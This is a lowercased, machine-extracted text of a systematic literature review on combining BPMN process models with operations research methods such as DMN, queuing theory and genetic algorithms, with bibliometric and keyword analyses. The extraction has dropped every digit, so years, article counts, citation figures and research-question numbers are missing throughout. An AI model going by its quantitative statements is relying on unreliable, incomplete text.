multi-criteria decision-making (mcdm) tasks comprises the search for optimal values of the unknowns, which are simultaneously assessed according to several often contradictory criteria. thus, the mathematical model of multi-criteria decision problems contains several purpose functions. depending on how the sets of decision variants are defined, we are talking about the tasks of multi-criteria linear programming or multi-criteria evaluation of options. a review of applications of analytic hierarchy process in operational management is inverstigated in subramanian & ramanathan ( ). the article velasquez & hester ( ) performs a literature review of common multi-criteria decision making methods. the authors present the results of a bibliometric-based survey on ahp and topsis techniques in publication zyoud & fuchs-hanusch ( ). project planning project management tasks consist of several separate activities that are interdependent and may be run simultaneously. the most commonly used method is the so-called network analysis, where a network graph is created from the left chronologically arranged project activities representing the project life cycle. the longest possible path from the beginning to the end of the project is recorded by “the critical path”. the non-observance of this path will lead to a slowing down of the whole project, whose time duration is to be optimized. the optimistic, pessimistic, and most probable estimate of the implementation of the entire project is determined. the article nutt ( ) relates the project planning process and implementation. critical path method (cpm) is found in the article jaafari ( ), to be equally useful as a planning tool for linear or repetitive projects. the resource-constrained project scheduling problem (rcpsp) is a general problem in scheduling. the article pellerin, perrier & berthaut ( ) examines the general tendency of moving from pure metaheuristic methods to solving the rcpsp to hybrid methods that rely on different metaheuristic strategies (cimr, cimler & tomaskova, ). nonlinear programming nonlinear programming is the case when the purpose function is not linear. tasks then often have a large number of local extremes and often also have great difficulty finding them. dynamic programming if constraints are functions of some parameter, which is most often time, we are talking about dynamic programming. this approach deals with the modelling of more complex multi-stage optimization problems divisible into related sub-problems. depending on the time parameter, the system is always in one of the acceptable states during the process. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ at certain times it is necessary to choose from a set of possible decisions, which again results in the transition to the next state. we call the strategy a sequence of these states of the system and choices, looking for the course with the best valuation. simulations are often used to model and analyze the operation of complex systems without realization and in less than real-time. � queuing theory is a type of dynamic programming task. it deals with streamlining the functioning of systems in which it is necessary to gradually serve all units whose requirements are continuously met on so-called service lines. the challenge is to find the most effective way to handle these requirements. � inventory management models address the issue of optimizing the supply process and the volume of inventory stored. costs associated with ordering, issuing, and keeping stocks in stock should be minimized. stochastic programming stochastic programming deals with optimization problems in which they act as parameters of their constraints of random variables. probabilistic calculus methods solve these problems, and their results have the character of random variables. stochastic processes can also be ranked among tasks with the input data uncertainties. this approach is used to describe the behavior of systems evolving. we are talking about stochastic processes, a special case is the so-called markov chains and markov processes. basic books on this topic are, for example: kall, wallace & kall ( ), birge & louveaux ( ), shapiro, dentcheva & ruszczy�nski ( ). research methodology kitchenham & charters ( ) highlighted three essential elements for a systematic literary review: the determination of the research question(s), the organisation of an unbiased and extensive analysis of related publications, and the determination of precise criteria of inclusion and exclusion. we identified three research questions: � research question (r ): greater adaptability of bpmn elements causes greater application of this notation in publications. � research question (r ): the connection between bpmn and or methods is most often applied to the business and economics areas. � research question (r ): the queue theory is the most widely used method in bpmn processes. the analysis process and criteria are given in the following relevant subsections. eligibility criteria this study included publications listed in the web of science (wos) database of clarivate analytics that were published between january and may . the year was selected as this is when bpmn was created by bpmi. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ exclusion criteria (ec) are: � ec = the publication was published in a language other than english. � ec = the full text of the publications was not available. � ec = the publication did not coincide with the topic of systematic research. � ec = bpmn was used only as a presentation tool and not as part of the research. information sources and search the primary source of information for the study was the database web of science (wos) of clarivate analytics. an advanced search was performed for the search query mentiones below. the search was performed in the topics (ts) section. especially, the core database with the indexes listed in table was selected. the search was performed for ‘all document types,’ ‘all languages’ and the years – . study selection the first step of the review process involved title and abstract screening, followed by a full-text review of the remaining articles. two independent assessors verified the results of the title and abstract screening and the full-text review. one assessed the suitability of the results from the perspective of or and the other from an it perspective, i.e. whether it was bpmn notation and its use. articles were included if they met all the following criteria: (i) they used an or method, (ii) a bpmn model was used and (iii) the complete text was available in english (abstracts, commentaries, letters and unpublished data were excluded). studies were not excluded based on their methodological quality. the selected publications were examined from many perspectives, and each contribution was coded according to different criteria. this study aimed to enhance the discipline’s fundamental progress in understanding the link between or methods and bpmn. the results of this study could encourage scientists to use or methods for process analysis. table web of science core collection indexes. indexes abbreviation science citation index expanded (sci-expanded) social sciences citation index (ssci) arts & humanities citation index (a&hci) conference proceedings citation index—science (cpci-s) conference proceedings citation index—social science & humanities (cpci-ssh) book citation index—science (bkci-s) book citation index—social sciences & humanities (bkci-ssh) emerging sources citation index (esci) current chemical reactions (ccr-expanded) index chemicus (ic) tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a limitation of this review was restricting the included articles to english-language publications that looked at process analysis using or and bpmn published between january and may . relevant studies in other languages or published after may may have been omitted. data collection process data was collected based on keywords selected from the article lane, mansour & harpell ( ), which analyzed the quantitative techniques of operation research. from this document, the operation research methods were selected and listed in the table . the results were further categorized as to whether they corresponded to the given keywords and their meaning. the main results of the systematic literature review were obtained by analyzing by the two main guidelines of prisma: moher et al. ( ) and mecir: higgins et al. ( ). synthesis of results the individual studies were subjected to bibliometric analysis and then the studies were assessed according to the content and methods used. the bibliometric analysis describes and analyses up to date research. it aims at summarizing the latest progress in the field by quantitatively investigating the literature. this method provides a vast canvas of knowledge from the micro-level (institutes, researchers, and campuses) to the macro-level (countries and continents) mryglod et al. ( ). frequency analysis was used to find the most common scientific areas, the countries with the most publications and the most table electronic search strategy in wos. query results ts=(computer and programming and bpmn) ts=(decision and analysis and bpmn) ts=(decision and theory and bpmn) ts=(dynamic and programming and bpmn) ts=(heuristic and programming and bpmn) ts=(hypothesis and testing and bpmn) ts=(inventory and control and bpmn) ts=(linear and regression and bpmn) ts=(linear and programming and bpmn) ts=(math and analysis and bpmn) ts=(math and programming and bpmn) ts=(network and analysis and bpmn) ts=(nonlinear and programming and bpmn) ts=(pert and bpmn) ts=(probability and bpmn) ts=(queuing and bpmn) ts=(statistic and bpmn) ts=(stochastic and processes and bpmn) tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ common keywords. science mapping was performing using the vos viewer, venn diagrams and bar and bubble graphs, van eck et al. ( ), cobo et al. ( ). the venn/euler diagram graphically represents the relationships of the largest set of keywords. euler diagrams are considered to be an effective means of visualizing containment, intersection, and exclusion. the goal of this type of graph is to communicate scientific results visually. leonhard euler first popularized the principle of labeled closed curves in the article euler ( ) alternative names for euler diagrams include ‘euler circles.’ they can also be incorrectly called venn diagrams. venn diagrams require all possible curve intersections to be present, so can be seen as a subset of euler diagrams, that is, every venn diagram is a euler diagram, but not every euler diagram is a venn diagram. john venn introduced venn diagrams a hundred years after euler in the article venn ( ). venn diagram is a schematic graph used in logic theory to depict collections of sets and represent their relationships. results the initial search resulted in articles. after removing duplicates, were left that underwent title and abstract screening. after screening, articles remained that underwent full-text review. the final number of included articles for information abstraction was . overview of the number of publications according to exclusion criteria is shown in fig. . eighteen keywords selected from the article by lane, mansour & harpell ( ) were involved in the study. these keywords have been classified according to whether a publication meeting a study condition has been found for them. only for keywords were found a publication suitable for this study, as can be seen in table categorization of publications based on the clarivate analytics journals and books covered by the web of science core collection were assigned to at least one web of science category. each web of science category was mapped to figure overview of the systematic review. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ one research area clarivate analytics ( ). the research areas for the selected publications were: � computer science (cs) � engineering (en) � operational research management science (or) � business economics (be) � robotics (ro) � automation control systems (acs) � telecommunications (te) � transportation (tr) we selected four main groups, for which we compiled a bar graph and a venn diagram after analysis. we chose the number of four research areas for representation in the venn diagram; four sets are still well arranged. another argument was the number of publications in other areas, where the set "robotics" contains two documents and the sets ‘automation control systems,’ ‘telecommunications’ and ‘transportation’ each one document. bar graph on fig. is based on frequency analysis and contains the total number of publications in a given research area, their average number of citations, and the corresponding average number of pages per article. the graph shows the results by type of purpose. the first part shows the frequency of documents for each research areas. the second part focuses on the average number of citations, and the third shows the average number of pages per article. figure research areas of selected publications, documents, average citations and average pages. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the venn diagram, in fig. , shows selected four research areas as sets, including their intersection areas. in a specific area, we also stated the relevant number of documents and their average number of citations. this part of the bibliometric analysis showed us the answer to the research question r . although bpmn was explicitly designed for corporate analysis and economic analysis, and operational research focuses primarily on addressing managerial decisions, most publications were not in the field of business economics (be). surprisingly, this area actually has the fewest publications. the field of computer science had the most papers, and papers in the field of or had the most citations. the field of be had the most extended publications, however, i.e. the average number of pages per paper. result : research question r —not confirmed. year of publication figure illustrates the distribution over time of the selected publications with bpmn milestones. the bpmn versions adoption dates, taken from omg.org ( ), complements this figure. the different bpmn versions brought more or fewer changes in notation. while the changes between bpmn . and bpmn . were rather consmetics, e.g. renaming ‘rule’ elements to ‘conditional’ or slight increasing the number of elements from to . the arrival of bpmn . was a major breakthrough and represented the largest revision of bpmn since its inception. in this version, it is possible to create a new ‘choreography model,’ ‘collaborations model’ and ‘conversation model’ in bpmn in addition to collaborative processes and internal (private) business processes. events are now divided into ‘interrupted’ and ‘non-interrupted’ and ‘catching’ and ‘throwing.’ the message type is figure venn diagram of research areas of selected publications, the average number of citations is listed in the parentheses. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ newly introduced, and the data object has three specifications. bpmn . contains elements. bpmn . . included only minor modifications in terms of typos. given the magnitude of changes between the different versions of the bpmn notation, the sharp increase in publications following the introduction of the bpmn . notation can be considered a confirmation of research question r . it is very interesting that publications in the field of be did not appear until . result: research question r —confirmed. the average number of citations of the analysed documents was . . the first quartile was , and the third quartile was . . the median was equal to and data variability above the third quartile was limited to seven citations. we identified two outliers values: citations for hasic, de smedt & vanthienen ( ) and citations for article wu et al. ( ). author analyses bibliometric analysis cannot be done without review by the authors. we focused on illustrating co-authorship. the total number of authors of publications selected for this study was : al achhab, m ( ), aouina, zk ( ), ayani, r ( ), aysolmaz, b ( ), bahaweres, rb ( ), batoulis, k ( ), ben ayed, ne ( ), ben said, l ( ), ben-abdallah, h ( ), bisogno, s ( ), bocciarelli, p ( ), boukadi, k ( ), braghetto, kr ( ), burattin, a ( ), calabrese, a ( ), ceballos, hg ( ), chien, cf ( ), cho, sy ( ), creese, s ( ), cunha, p ( ), d’ambrogio, a ( ), d’ambrogio, sa ( ), de lara, j ( ), de smedt, j ( ), demirors, o ( ), duran, f ( ), el hichami, o ( ), el mohajir, b ( ), ferreira, je ( ), figl, k ( ), fitriyah, a ( ), flores-solorio, v ( ), fookes, c ( ), garcia-vazquez, jp ( ), ghiron, nl ( ), ghlala, r ( ), gomez-martinez, e ( ), hansen, z ( ), hansen, znl ( ), happa, j ( ), hasic, f ( ), herbert, lt ( ), holm, g ( ), iren, d ( ), jacobsen, p ( ), jobczyk, k ( ), kamrani, f ( ), khlif, w ( ), kluza, k ( ), ligeza, a ( ), manuel vara, j ( ), marcos, e ( ), mazhar, s ( ), mendling, j ( ), mendoza morales, le ( ), mengersen, k ( ), monsalve, c ( ), moradi, f ( ), naoum, m ( ), onggo, bss ( ), pablo garcia, j ( ), figure distribution of the publications by year and their representation in research areas. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ perez-blanco, f ( ), pitchforth, j ( ), proudlove, nc ( ), rekik, m ( ), rocha, c ( ), rosemann, m ( ), rozy, nf ( ), salaun, g ( ), sharp, r ( ), sperduti, a ( ), suchenia, a ( ), tang, rz ( ), tokdemir, g ( ), tomaskova, h ( ), vanden broucke, sklm ( ), vanthienen, j ( ), veluscek, m ( ), villavicencio, m ( ), vincent, jm ( ), weske, m ( ), wisniewski, p ( ), wu, ppy ( ), xie, y ( ). these authors formed different sized groups, as can be seen in fig. . we grouped the authors according to their co-authors’ collaborations with a curve connecting the co-authors. the size of the node of this connection corresponds to the number of documents by the given author. the colours used to distinguish the authors were created using the average years of the publication of their papers. for the authors’ average publication years, the first quartile was , the third quartile was . and the median was . the variability outside the lower and upper quartiles figure division of authors into groups according to co-authorship. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ was given by and . we identified one outlier value corresponding to the year . the most prominent groups were around the authors listed in fig. . this figure also contains the number of documents by the authors, their total number of citations and their average value. according to this analysis wu, p. y. had the highest number of citations ( . ), followed by de smedt, j. ( ) and hasic, f. ( ). herbert, l.t. had the most documents ( ) and tomaskova, h. had no co-author connections. the authors were also analyzed in terms of their country or region affiliations. a total of countries were identified and their location, including the number of relevant publications, are shown in fig. . the countries with the highest number of affiliated publications were denmark ( ) and tunisia ( ), followed by belgium, france, saudi arabia, italy and spain, who all had three. keywords analysis the keywords were categorized according to those identified by the published authors and the keywords plus assigned by clarivate analytics databases. the data in keywords plus are words or phrases that frequently appear in the titles of an article’s references but do not appear in the title of the item itself. based upon a special algorithm that is unique to clarivate analytics databases, keywords plus enhances the power of cited- reference searching by searching across disciplines for all the articles that have cited references in common, more information is on the web link clarivate analytics ( ). a total of unique keywords and unique keywords plus keywords were found for selected publications. a total of author keywords were mentioned in the publications and a general view of their interconnection can be seen in fig. . below is a list of all author keywords with the number of the weight-link to other keywords: activity theory ( ), affiliation ( ), agent based model ( ), agent-based systems engineering ( ), airport passenger facilitation ( ), atl ( ), automated verification ( ), figure fifteen most successful authors. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bayesian network ( ), bayesian networks ( ), bpm ( ), bpmn ( ), bpmn business processes ( ), bpmn extension ( ), bpmn model restructuring ( ), business process ( ), business process automation ( ), business process management ( ), business process model ( ), business process model measures ( ), business process modelling notation ( ), business process optimisation ( ), business process outsourcing ( ), business processes ( ), cloud computing ( ), clustering ( ), communication theory ( ), configurable reference model ( ), consequence modelling and management ( ), contextual factors ( ), cycle time ( ), decision making ( ), decision mining ( ), decision model and notation ( ), decision modeling ( ), decision modelling ( ), dikw ( ), discrete-event simulation ( ), dmn ( ), effort prediction model ( ), engineering agent-based systems ( ), engineering systems ( ), enterprise risk management ( ), eqn ( ), evolutionary algorithm ( ), evolutionary algorithms ( ), facilitated modelling ( ), fault tree analysis ( ), fault tree generation ( ), flow ( ), formal risk analysis ( ), genetic algorithm ( ), healthcare ( ), hierarchical clustering ( ), incident response ( ), integrated modelling ( ), interviews ( ), jeqn ( ), knowledge discovery ( ), knowledge management ( ), knowledge rediscovery ( ), licenses ( ), maude ( ), mc-dmn ( ), mcdm ( ), mda ( ), metrics ( ), model checking ( ), model transformations ( ), model-driven architecture ( ), model-driven engineering ( ), modelling ( ), object modeling ( ), optimisation ( ), organizational mining ( ), performance ( ), performance evaluation ( ), petri nets ( ), pproduction optimisation ( ), preference to criteria ( ), prism ( ), probability ( ), process configuration ( ), process enhancement ( ), process chain network ( ), process merging ( ), process mining ( ), process modeling ( ), process modelling ( ), project management ( ), qualitative analysis ( ), quantitative model checking ( ), quantitative service analysis ( ), figure location of publications in the world, own processing. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ quantitative workflow analysis ( ), queues ( ), queuing theory ( ), reliability analysis and risk assessment methods ( ), resource allocation ( ), restructuring ( ), rewriting logic ( ), rules ( ), safety assessment software tools ( ), safety management and decision making ( ), security ( ), security operation center ( ), sense-making ( ), separation of concerns ( ), service engineering ( ), scheduling ( ), simulation ( ), simulations ( ), social network ( ), social network analysis ( ), social network model ( ), socio-technical systems (sts) ( ), soundness ( ), space-sensitive process model ( ), statistical model checking ( ), stocastic bpmn ( ), stochastic automata network ( ), stochastic bpmn ( ), stochastic model checking ( ), stochastic modeling and analysis ( ), structural and semantic aspects ( ), tacit knowledge ( ), task analysis ( ), task assignment ( ), task model ( ), timed automata ( ), topsis ( ), verification ( ). as you can see in the figure, most of the author’s keywords are directly or indirectly linked with the term ‘bpmn’, but there are also isolated groups. in the following text, figure co-ocurence of author keywords. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we’ve listed separate keyword groups. we’ve added a year of publication, a number of citations, and a specific document to which the keywords belong. � ; citations; (business process automation; business process model measures; effort prediction model; project management) aysolmaz, iren & demirors ( ). � ; citation; (evolutionary algorithm; pproduction optimisation; stocastic bpmn) herbert et al. ( ), � ; citations; (agent based model; bayesian network; business process modelling notation; modelling; socio-technical systems (sts)) wu et al. ( ), � ; citation; (affiliation; bpm; hierarchical clustering; knowledge discovery; knowledge rediscovery; restructuring; social network model) khlif & ben-abdallah ( ), � ; citations; (bpmn extension; business process outsourcing; cloud computing; genetic algorithm) rekik, boukadi & ben-abdallah ( ). � ; citations; (bpmn model restructuring; clustering; metrics; rules; social network; structural and semantic aspects) khlif, ben-abdallah & ben ayed ( ). � ; citations; (atl; business process model; model transformations; model-driven engineering; petri nets; process chain network) gómez-martnez et al. ( ). as mentioned above, there were only keywords plus keywords (the number of links to other keywords is given in parentheses after the keyword): accuracy ( ), ambiguity ( ), automation ( ), bpmn ( ), business process models ( ), checking ( ), cognitive effectiveness ( ), communities ( ), complex ( ), confidence ( ), context ( ), critical path ( ), decision-making ( ), design ( ), dimensions ( ), distributed simulation ( ), framework ( ), functional size ( ), group creativity ( ), identification ( ), figure co-ocurence of keywordsplus. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementation ( ), information ( ), integration ( ), model ( ), neural-network ( ), organizational knowledge ( ), patterns ( ), performance ( ), process execution ( ), process models ( ), productivity ( ), quality ( ), reality ( ), reference models ( ), resources ( ), risk ( ), science research ( ), semantics ( ), sensemaking ( ), simulation ( ), strategy ( ), systems ( ), tables ( ), verification ( ), web ( ), workflow ( ). as can be seen in fig. , these keywords are far more separate from each other compared to the author’s keywords. classification of articles by methodology based on the expert assessment, we examined the documents regarding the methods and approaches used. we created seven groups corresponding to a method or approach that was an essential part of the publication: probabilistic models, decision model and notation (dmn), dynamic task assignment problem, evolutionary and genetics algorithms, queuing theory, social networks and others. these groups were also based on keyword analysis, as some separate groups of copyright keywords belong to highly unique articles. we assigned each document to just one group. that is in contradiction to research areas, where one article can be attributed to more than one research area. the individual documents and their division between research areas and methodological groups can be seen in table . we further analyzed the documents regarding their years of publication and plotted a bubble graph (fig. ) with the publication years on the x.axis and the methodological groups on the y-axis. the appropriate number of publications corresponding to the given year and the group is indicated in the respective bubble. this quantity is also graphically represented by the size of the given bubble. the largest group consisted of publications on dmn and bpmn. given the initiate year of dmn, this is the most significant approach serving with bpmn. dmn . was made available to the public in september , the omg group released dmn . in june , dmn . was released in january and the latest version of dmn . was released in march . the latest version did not affect this systematic search; however, the growth of publications since (see fig. , for example, was undoubtedly be affected by the dmn update. we only assigned four documents to the methodological group focused on queue theory (see table and fig. ). the specific articles are listed in the following section under the appropriate heading. as the largest group was the dmn and bpmn group, we can thus rule out research question r . result: research question r —not confirmed. the methods, techniques and approaches used in the included publications are listed in the following section. probabilistic models the probabilistic model can be used to make decisions when the activity reaches an exclusive splitting gateway and the activity’s subject must decide between alternative tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ actions. they can be used for predicting or deciding between alternative works based on desirable outcomes. probabilistic models were presented in the following publications: � herbert & sharp ( ): quantitative analysis of probabilistic bpmn workflows; � herbert & sharp ( ): precise quantitative analysis of probabilistic business process model and notation workflows; � ceballos, flores-solorio & garcia-vazquez ( ): towards probabilistic decision making on human activities modeled with business process diagrams; � ceballos, flores-solorio & pablo garcia ( ): a probabilistic bpmn normal form to model and advise human activities; � naoum et al. ( ): a probabilistic method for business process verification: reachability, liveness and deadlock detection, there the (causal) bayesian network or markov decision processes were used. table documents division according to the research areas and methodological groups. indexes abbreviation science citation index expanded (sci-expanded) social sciences citation index (ssci) computer science ( ) engineering ( ) operational research ( ) business economics ( ) probabilistic models ( ) herbert & sharp ( , ), ceballos, flores- solorio & garcia-vazquez ( ), ceballos, flores-solorio & pablo garcia ( ), naoum et al. ( ) herbert & sharp ( ), herbert & sharp ( ), ceballos, flores- solorio & garcia-vazquez ( ) dmn ( ) batoulis & weske ( ), ghlala, aouina & ben said ( ), hasic, de smedt & vanthienen ( ), de smedt et al. ( ), durán, rocha & salaün ( ), suchenia et al. ( ), cho, happa & creese ( ) figl et al. ( ), suchenia et al. ( ), cho, happa & creese ( ) batoulis & weske ( ), hasic, de smedt & vanthienen ( batoulis & weske ( ), tomaskova ( ), mazhar, wu & rosemann ( ) dynamic task assignment problem ( ) xie, chien & tang ( ) xie, chien & tang ( ) evolutionary and genetic algorithms ( ) herbert & sharp ( b), rekik, boukadi & ben-abdallah ( ) herbert & sharp ( b), herbert et al. ( ), herbert, hansen & jacobsen ( ), herbert & hansen ( ) herbert & hansen ( ) queuing theory ( ) bocciarelli & d’ambrogio ( ), bahaweres, fitriyah & rozy ( ), gómez-martnez et al. ( ) bocciarelli & d’ambrogio ( ) onggo et al. ( ) onggo et al. ( ) social network ( ) khlif & ben-abdallah ( ) khlif, ben-abdallah & ben ayed ( ) other ( ) kamrani et al. ( ), braghetto, ferreira & vincent ( ), aysolmaz, iren & demirors ( ), burattin, sperduti & veluscek ( ), wu et al. ( ), mendoza morales, monsalve & villavicencio ( ), duran, rocha & salaun ( ) kamrani et al. ( ), burattin, sperduti & veluscek ( ), herbert & sharp ( a), herbert, hansen & jacobsen ( ) kamrani et al. ( ), wu et al. ( ) tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dmn and decision analysis decision model and notation (dmn) is an industry standard for modeling and executing decisions that are determined by business rules. the association of dmn and bpmn is now common practice: � batoulis & weske ( ): soundness of decision-aware business processes, � de smedt et al. ( ): holistic discovery of decision models from process execution data, � durán, rocha & salaün ( ): a rewriting logic approach to resource allocation analysis in business process models, � figl et al. ( ): what we know and what we do not know about dmn, � ghlala, aouina & ben said ( ): mc-dmn: meeting mcdm with dmn involving multi-criteria decision-making in business process � hasic, de smedt & vanthienen ( ): augmenting processes with decision intelligence: principles for integrated modelling � cho, happa & creese ( ): capturing tacit knowledge in security operation centers, � mazhar, wu & rosemann ( ): designing complex socio-technical process systems - the airport example, � suchenia et al. ( ): towards knowledge interoperability between the uml, dmn, bpmn and cmmn models � tomaskova ( ): modeling business processes for decision-making. both standards fall under omg. dynamic task assignment approach the study : a dynamic task assignment approach based on individual worklists for minimizing the cycle time of business processes by xie, chien & tang ( ) develop a figure buble graph—quantity of article according to methodological groups and publication year. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dynamic task assignment approach for minimizing the cycle time of business processes. the contribution of this article lies in developing a dynamic task assignment approach based on queuing theory, individual worklist model, and stochastic theory. evolutionary and genetic algorithms the evolutionary algorithm was applied in the following publications: � herbert & sharp ( b): optimisation of bpmn business models via model checking; � herbert et al. ( ): evolutionary optimization of production materials workflow processes; � herbert, hansen & jacobsen ( ): using quantitative stochastic model checking tool to increase safety and improve efficiency in production processes; � herbert & hansen ( ): restructuring of workflows to minimise errors via stochastic model checking: an automated evolutionary approach; to optimize the bp diagram, thus looking for a more efficient process. especially the publication: specifying business process outsourcing requirements, rekik, boukadi & ben-abdallah ( ), presented a genetic algorithm to identify most appropriate activities of a business process that should be outsourced. queuing theory in the article: comparative analysis of business process litigation using queue theory and simulation (case study: religious courts of south jakarta) bahaweres, fitriyah & rozy ( ), onggo et al. ( ). a bpmn extension to support discrete-event simulation for healthcare applications: an explicit representation of queues, attributes and data-driven decision points onggo et al. ( ) and gómez-martnez et al. ( ). formal support of process chain networks using model-driven engineering and petri nets gómez- martnez et al. ( ), the authors use queuing theory and simulation to compare processes modeled in bpmn. in the article: automated performance analysis of business processes bocciarelli & d’ambrogio ( ), authors presented a bp performance model of eqn (extended queueing network) type. social network the publications below focus on the application of social network analysis metrics (sna) to studies of biological interaction networks in informatics. � khlif & ben-abdallah ( ): semantic and structural performer clustering in bpmn models transformed into social network models; � khlif, ben-abdallah & ben ayed ( ): a methodology for the semantic and structural restructuring of bpmn models. other approaches the following publications were unique in their approaches. we can mention for example: workflow fault tree generation through model checking by herbert & sharp ( a) with tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fmea analysis. an effort prediction model based on bpm measures for process by aysolmaz, iren & demirors ( ) with linear multiple regression analysis. performance evaluation of business processes through a formal transformation to san by braghetto, ferreira & vincent ( ) using stochastic automata network. estimating performance of a business process model by kamrani et al. ( ) using a task assignment approach. formal verification of business processes as timed automata by mendoza morales, monsalve & villavicencio ( ) convert bpmn to timed automata and then perform standard queuing analysis. business models enhancement through discovery of roles by burattin, sperduti & veluscek ( ), there the authors have extended the process model to roles, specifically designed role-sharing algorithm. stochastic analysis of bpmn with time in rewriting logic by duran, rocha & salaun ( ) presents a rewriting logic executable specification of bpmn with time and extended with probabilities. sbat: a stochastic bpmn analysis tool by herbert, hansen & jacobsen ( ) presents sbat, a tool framework for the modelling and analysis of complex business workflows and a framework for model integration and holistic modelling of socio-technical systems by wu et al. ( ) presents a layered framework for the purposes of integrating different socio-technical systems (sts) models and perspectives into a whole-of-systems model. discussion we have identified several gaps in the research and issues that need to be addressed in future research. the main gaps concern the research area of business economics. we assumed that this area would be the main and most frequent for the combination of bpmn and or methods. however, we found that this area could be affected by the absence of specific notation. the relevant publications were written only after the release of version dmn . . the effect of dmn notation will be addressed in future research. an unexpected gap was a solution to finance and human resources management through or. we would like to introduce publications savku & weber ( ) and graczyk- kucharska et al. ( ) as the pioneering works. the first article added the problem of optimal consumption problem from cash flow with delay and regimes. the authors developed the general analytic model setting and methods for the solution by studying a stochastic optimal control problem using the tools of the maximum principle. they proved the necessary and sufficient maximum principles for a delayed jump-diffusion with regimes under full and partial information. the second publication focused on transversal competencies, which are sets of knowledge, skills and attitudes required for different positions and in different professions. the authors used the method of multivariate additive regression spline together with artificial neural networks to create a model describing the influence of various variables on the acceleration of the acquisition of transverse competencies. we assume that future research will be influenced by simulation and prediction methods. this study showed the use of agent-based modelling methods and discrete- event simulations, or probabilistic models and social networks, but neural networks or artificial intelligence methods appeared in any publication. based on this study, we further expect the use of more sophisticated approaches and the effect of new techniques. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ at the same time, it is possible to extend process modelling to inaccurate data using fuzzy methods. conclusion this paper presented a systematic overview of publications using bpmn and or methods in process analysis. we analyzed articles, that were selected using the appropriate strings in the advanced search option of in the wos database. the papers that met the conditions of the study were subjected to various analyzes and were briefly described. the review showed that the processes modelled by bpmn can be extended or analyzed as probabilistic processes, queue theory, or role and task assignments. alternatively, processes can be optimized using evolutionary or genetic algorithms. the research also highlighted the need to identify keywords in publications correctly. for example, less than two-thirds of the selected articles contained the keyword bpmn, even though all the documents used this notation. most of the articles were so-called one-off publications. only a small number of author teams developed their topic in further continuing publications. due to this, the average number of citations is relatively low. due to the average number of citations to the total number of publications in all research areas, documents falling into the field of operational research are outstanding; there is an average of seven citations per article. we analyzed the publications by research area and found that there is great potential for the research area of business economics (be). only a few papers were associated with this area (five in total) but all of them had a higher than average number of citations. the first document we included in this research area was published in , that is only in the last quarter of the examined publication years. this focus on be may have been initiated by the introduction of dmn notation. among the authors, smaller collaborating groups around the world were been identified. that groups co-work within the framework of co-authorship and co-citations. we only identified one single-author publication. the analysis of keywords showed a significant difference between the keywords assigned by the authors and the so-called keywords plus keywords. while the former were almost completely connected across publications, the latter were significantly diversified. we have pointed out that the introduction of bpmn . led to an increase in publications using this notation. acknowledgements the authors thank the student m. kopecký for support in the field of bpmn modeling. additional information and declarations funding the research has been supported by a gacr - s and by the faculty of informatics and management uhk specific research project. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: gacr - s. faculty of informatics and management uhk specific research project. competing interests the author declares that they have no competing interests. author contributions � hana tomaskova conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � gerhard-wilhelm weber analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: this article does not contain data or code because it is a literature review. references 